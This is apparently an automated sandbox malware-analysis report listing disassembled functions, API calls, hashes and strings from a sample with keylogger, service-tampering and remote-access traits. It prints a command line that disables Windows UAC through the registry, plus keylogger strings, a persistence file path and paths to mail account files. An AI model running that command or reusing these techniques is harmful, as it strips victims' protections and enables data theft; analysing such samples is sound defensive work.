                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 274C104B
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 274C1061
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 274C1075
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 274C1090
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 274C10B8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3594823470-0
                                                                                                                                                                    • Opcode ID: c3b03e53c2525f6d591c3eac894b24eb35120a97407fa1b78657a10fd07838dc
                                                                                                                                                                    • Instruction ID: 7207c3bc81ed9cd7fd95f00a3ccef0cc943350b8ec6e062e0be24db48fe3a182
                                                                                                                                                                    • Opcode Fuzzy Hash: c3b03e53c2525f6d591c3eac894b24eb35120a97407fa1b78657a10fd07838dc
                                                                                                                                                                    • Instruction Fuzzy Hash: 6821B2B9900318DBDF10DB66DC88EDF3778EF94218F10429EE959932A1DE349A85CF41
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                                                                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 493672254-0
                                                                                                                                                                    • Opcode ID: fb0c87ba4e4044b0bc5a4588c5d1fc6d348123838116356e3e6aad6caf79dae2
                                                                                                                                                                    • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                                                                                                                                    • Opcode Fuzzy Hash: fb0c87ba4e4044b0bc5a4588c5d1fc6d348123838116356e3e6aad6caf79dae2
                                                                                                                                                                    • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C3856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,274C3518,274C23F1,274C1F17), ref: 274C3864
                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 274C3872
                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 274C388B
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,274C3518,274C23F1,274C1F17), ref: 274C38DD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                    • Opcode ID: b2df3c5d90033608f4b8aa2b08f21334f68cce20aa6c013ea84b6ec7c7a0f278
                                                                                                                                                                    • Instruction ID: 145e2355c7b06b033ce040339a4cf574df65760f288a8474f7d8d51c550bcb39
                                                                                                                                                                    • Opcode Fuzzy Hash: b2df3c5d90033608f4b8aa2b08f21334f68cce20aa6c013ea84b6ec7c7a0f278
                                                                                                                                                                    • Instruction Fuzzy Hash: 3201473E609B12DEF302D67A6D86AD62BE4DB95A7DF20423DE110941D2EF194841832F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                                                                    • _free.LIBCMT ref: 0044824C
                                                                                                                                                                    • _free.LIBCMT ref: 00448274
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                                                                    • _abort.LIBCMT ref: 00448293
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                    • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                                                                                                                    • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                                                                                                                                    • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                                                                                                                    • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C5AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,274C6C6C), ref: 274C5AFA
                                                                                                                                                                    • _free.LIBCMT ref: 274C5B2D
                                                                                                                                                                    • _free.LIBCMT ref: 274C5B55
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,274C6C6C), ref: 274C5B62
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,274C6C6C), ref: 274C5B6E
                                                                                                                                                                    • _abort.LIBCMT ref: 274C5B74
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                    • Opcode ID: b9ee603c802171c44c593567693b0d333a26533d816560f102eb1d739e5e115f
                                                                                                                                                                    • Instruction ID: 741182f16d640a872b4473ea9d3323c7f6502cd16f90637fb1b4ddf73fb5e6de
                                                                                                                                                                    • Opcode Fuzzy Hash: b9ee603c802171c44c593567693b0d333a26533d816560f102eb1d739e5e115f
                                                                                                                                                                    • Instruction Fuzzy Hash: BAF0C83E545520EBD307E3396C0AEEFAE699FE1D75F36012CF91896281FE2885434166
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 221034970-0
                                                                                                                                                                    • Opcode ID: eda13e38d8a3146ab63ff07a3ca7716483300a79ca53aa78cee06ed6382f1e82
                                                                                                                                                                    • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                                                                                                                                    • Opcode Fuzzy Hash: eda13e38d8a3146ab63ff07a3ca7716483300a79ca53aa78cee06ed6382f1e82
                                                                                                                                                                    • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 221034970-0
                                                                                                                                                                    • Opcode ID: 6e3f17907006f9b14c266842471996563c875abd3fd739ef86307a469298e104
                                                                                                                                                                    • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                                                                                                                                    • Opcode Fuzzy Hash: 6e3f17907006f9b14c266842471996563c875abd3fd739ef86307a469298e104
                                                                                                                                                                    • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 221034970-0
                                                                                                                                                                    • Opcode ID: 23a00401f81ef66e1f28e228ef782f054758fa37ca42b77af94f3a0d5dd06f84
                                                                                                                                                                    • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                                                                                                                                    • Opcode Fuzzy Hash: 23a00401f81ef66e1f28e228ef782f054758fa37ca42b77af94f3a0d5dd06f84
                                                                                                                                                                    • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 274C1E89: lstrlenW.KERNEL32(?,?,?,?,?,274C10DF,?,?,?,00000000), ref: 274C1E9A
                                                                                                                                                                      • Part of subcall function 274C1E89: lstrcatW.KERNEL32(?,?), ref: 274C1EAC
                                                                                                                                                                      • Part of subcall function 274C1E89: lstrlenW.KERNEL32(?,?,274C10DF,?,?,?,00000000), ref: 274C1EB3
                                                                                                                                                                      • Part of subcall function 274C1E89: lstrlenW.KERNEL32(?,?,274C10DF,?,?,?,00000000), ref: 274C1EC8
                                                                                                                                                                      • Part of subcall function 274C1E89: lstrcatW.KERNEL32(?,274C10DF), ref: 274C1ED3
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 274C122A
                                                                                                                                                                      • Part of subcall function 274C173A: _strlen.LIBCMT ref: 274C1855
                                                                                                                                                                      • Part of subcall function 274C173A: _strlen.LIBCMT ref: 274C1869
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                    • API String ID: 4036392271-1520055953
                                                                                                                                                                    • Opcode ID: ddcf4ae052102cf1e29855ba581d306a5cc622736d7c8d1aad7f730f18e0ef3c
                                                                                                                                                                    • Instruction ID: fe31530a95f6baa8549977d06e622be541ca09846835edd0e25a6e4f61d99bda
                                                                                                                                                                    • Opcode Fuzzy Hash: ddcf4ae052102cf1e29855ba581d306a5cc622736d7c8d1aad7f730f18e0ef3c
                                                                                                                                                                    • Instruction Fuzzy Hash: D521B4BDA10208AAEB10D794EC91FEE7339EF90B14F10155AFA04EB1D4EAB11D818759
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                                                                                                                    • wsprintfW.USER32 ref: 0040B1F3
                                                                                                                                                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EventLocalTimewsprintf
                                                                                                                                                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                    • API String ID: 1497725170-248792730
                                                                                                                                                                    • Opcode ID: 8a11c7058c99d287891ca40a959def1c315cce1686fe69983689fdf637a4f704
                                                                                                                                                                    • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                                                                                                                                    • Opcode Fuzzy Hash: 8a11c7058c99d287891ca40a959def1c315cce1686fe69983689fdf637a4f704
                                                                                                                                                                    • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                                                                                                                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041D580
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                    • String ID: 0$MsgWindowClass
                                                                                                                                                                    • API String ID: 2877667751-2410386613
                                                                                                                                                                    • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                                                                                                                    • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                                                                                                                                    • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                                                                                                                    • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004077AA
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004077AF
                                                                                                                                                                    Strings
                                                                                                                                                                    • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                                                                                                                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$CreateProcess
                                                                                                                                                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                    • API String ID: 2922976086-4183131282
                                                                                                                                                                    • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                                                                                                    • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                                                                                                                                    • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                                                                                                    • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • C:\Users\Public\Libraries\lhgtogaW.pif, xrefs: 004076C4
                                                                                                                                                                    • Rmc-V052BG, xrefs: 004076DA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: C:\Users\Public\Libraries\lhgtogaW.pif$Rmc-V052BG
                                                                                                                                                                    • API String ID: 0-1945959475
                                                                                                                                                                    • Opcode ID: ba7a0da6d6d8a9377fe19e34afbb78340df493f1225962a1f6fa7fa9e137973f
                                                                                                                                                                    • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                                                                                                                                    • Opcode Fuzzy Hash: ba7a0da6d6d8a9377fe19e34afbb78340df493f1225962a1f6fa7fa9e137973f
                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
